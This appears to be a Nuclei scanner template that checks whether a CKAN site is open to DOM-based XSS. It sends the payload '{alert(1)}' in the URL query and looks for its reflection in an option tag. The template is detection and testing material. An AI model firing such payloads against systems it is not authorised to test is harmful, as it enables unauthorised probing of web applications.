id: ckan-dom-based-xss
info:
  name: CKAN DOM Based XSS
  author: dhiyaneshDk
  severity: medium
  description: CKAN uses the old jQuery Sparkle library which is vulnerable to DOM Based XSS.
  reference:
    - https://github.com/ckan/ckan/blob/b9e45e2723d4abd70fa72b16ec4a0bebc795c56b/ckan/public/base/javascript/view-filters.js#L27
  tags: dom,xss
requests:
  - method: GET
    path:
      - '{{BaseURL}}/?{alert(1)}'
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - '<option value="/en/?{alert(1)}" selected="selected">'
      - type: word
        words:
          - 'text/html'
        part: header
